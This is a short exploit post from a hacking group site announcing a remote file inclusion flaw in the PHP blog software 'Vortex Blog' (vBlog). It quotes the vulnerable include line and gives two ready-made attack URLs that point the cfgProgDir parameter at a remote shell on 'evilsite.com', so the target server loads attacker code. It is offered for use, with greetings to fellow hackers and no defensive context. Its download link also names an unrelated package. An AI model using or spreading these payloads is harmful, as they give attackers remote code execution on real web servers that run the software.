WwW.Deltahacking.NeT (Priv8 Site)
WwW.Deltahacking.Ir (Public Site)
Portal Name :Vortex Blog AKA vBlog
Class = Remote File Inclusion ;
Download =http://switch.dl.sourceforge.net/sourceforge/c12/C12_a0.1_nonfunc.zip
Found by = Dr.Pantagon ([email protected])
Vulnerable Code
include($cfgProgDir . "session.php");
++++++++++++++++++++++++++++++++++++++++++++
Exploit:
http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?
http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?
Special Thanks : Dr.Trojan , Hiv++ , D_7j , Lord
Special Thanks To Best My Friend : Tanha